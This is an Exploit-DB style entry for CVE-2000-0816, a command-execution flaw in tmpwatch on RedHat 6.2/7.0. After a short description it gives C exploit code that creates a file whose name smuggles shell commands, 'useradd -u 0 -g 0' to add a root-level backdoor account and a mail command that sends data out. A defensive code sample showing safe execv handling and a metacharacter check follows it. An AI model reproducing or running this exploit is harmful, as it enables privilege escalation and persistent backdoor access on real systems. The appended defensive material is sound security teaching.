Exploit RedHat 6.2/7.0 Tmpwatch - Arbitrary Command Execution

Exploiter

18 Dec 2022
EDB-ID
20285
EDB verification
  1. Passed
Author
X-FORCE
Vulnerability type
LOCAL
Platform
LINUX
CVE
CVE-2000-0816
Publication date
2000-10-06
C:
// source: https://www.securityfocus.com/bid/1785/info

A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in Unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system() library calls. If an attacker creates a file with a maliciously constructed filename including shell metacharacters, and -fuser is run on this file, the attacker may be able to execute arbitrary commands, potentially compromising superuser access if tmpwatch is run with root privileges.

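#include <stdio.h>
#include <stdlib.h>   /* exit() */

int main(void)
{
   FILE *f;
   /* The file name itself carries the shell metacharacters (; and <). */
   char filename[100] = ";useradd -u 0 -g 0 haks0r;mail [email protected]<blablabla";

   /* Create an empty file with that name in the current directory. */
   if((f = fopen(filename, "a")) == NULL) {
      perror("Could not create file");
      exit(1);
   }
   fclose(f);   /* a FILE * is closed with fclose(), not close() */
   return 0;
}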
 
Source
www.exploit-db.com
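
The root cause described above is a file name being pasted into a command string for system(). The following is an added example, not part of the original post and not tmpwatch source: it shows an audit check for names containing shell metacharacters and a fork/execv call that hands the name to a program as a single argument with no shell involved. The helper names `name_has_shell_meta` and `run_on_file`, the sample file names, and the use of /bin/echo as a stand-in program are assumptions made for illustration.

```c
/* Added illustration; not tmpwatch source. Helper names are hypothetical. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Characters a POSIX shell interprets; any of them in a file name changes
 * the meaning of a command string built for system(). */
static const char SHELL_META[] = ";|&<>$`\\\"'()*?[]{}~!# \t\n";

/* Audit helper: 1 if the name would be unsafe inside a shell command. */
int name_has_shell_meta(const char *name)
{
    return name[strcspn(name, SHELL_META)] != '\0';
}

/* Run `prog path` with no shell in between: path reaches the program as one
 * argv element, byte for byte. Returns the exit status, or -1 on failure. */
int run_on_file(const char *prog, const char *path)
{
    char *const argv[] = { (char *)prog, (char *)path, NULL };
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(prog, argv);   /* absolute path: no PATH lookup, no /bin/sh */
        _exit(127);          /* exec itself failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed sample names, not taken from a real system. */
    const char *names[] = { "/tmp/report.txt", "/tmp/x;echo marker" };

    for (size_t i = 0; i < 2; i++)
        printf("%-22s shell metacharacters: %s\n", names[i],
               name_has_shell_meta(names[i]) ? "yes" : "no");
    /* /bin/echo stands in for the checker; it prints the name literally. */
    return run_on_file("/bin/echo", names[1]) == 0 ? 0 : 1;
}
```

The metacharacter check is useful for auditing and logging; the fix itself is the execv call, which stays safe for any file name because nothing parses the name as a command.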
